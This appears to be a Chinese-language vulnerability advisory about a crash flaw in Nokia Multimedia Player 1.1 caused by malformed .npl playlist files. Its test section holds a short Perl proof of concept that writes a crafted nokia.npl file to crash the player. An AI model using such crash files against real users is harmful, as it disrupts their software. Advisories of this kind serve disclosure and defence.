漏洞起因
异常条件处理失败错误
影响系统
Nokia Multimedia Player 1.1
不受影响系统
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须构建恶意.npl文件,诱使用户打开。
漏洞信息
Nokia Multimedia Player是一款诺基亚公司开发的媒体播放程序。
Nokia Multimedia Player不正确处理.npl文件,构建恶意文件,诱使用户打开,可导致程序崩溃。
测试方法
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] support e-mail : submit[at]inj3ct0r.com
#!/usr/bin/perl
#Nokia Multimedia Player 1.1 (.npl) Local Stack Overflow POC
#Finded by : opt!x hacker
#Download :
http://nds1.nokia.com/phones/files/software/nokia_multimedia_player_en.exe
#http://img136.imageshack.us/img136/6486/nokiai.png
#http://img19.imageshack.us/img19/2512/nokiacrash.png
#Greetz: H-RAF , his0k4
my $junk="A"x 4;
open(MYFILE,’>>nokia.npl’);
print MYFILE $junk;
close(MYFILE);
厂商解决方案
目前没有详细解决方案提供:
http://www.nokia.com/
漏洞提供者
Inj3ct0r
0 条评论。